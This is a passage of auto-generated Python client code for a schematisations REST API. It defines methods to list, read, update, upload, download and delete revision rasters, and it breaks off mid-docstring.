asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_delete(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_delete_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_delete_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_delete_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_download(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_download(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Download
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_download_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_download_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_download # noqa: E501
Endpoint for downloading files. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_download_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Download, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_download" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_download`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_download`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_download`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/download/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Download', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_list(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_list(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_list_with_http_info(revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_list_with_http_info(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_list_with_http_info(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2002, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_list`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_partial_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_partial_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_partial_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_partial_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_partial_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_read(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_read(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_read_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_rasters_read_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_read # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_read_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_read`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_update # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionRaster data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_upload(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_upload # noqa: E501
Endpoint for uploading a raster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_upload(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param Upload data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Upload
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_upload_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_upload_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_upload # noqa: E501
Endpoint for uploading a raster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_upload_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision raster. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param Upload data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Upload, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_upload" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_upload`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/{id}/upload/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Upload', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_read(self, id, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_read # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_read(id, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
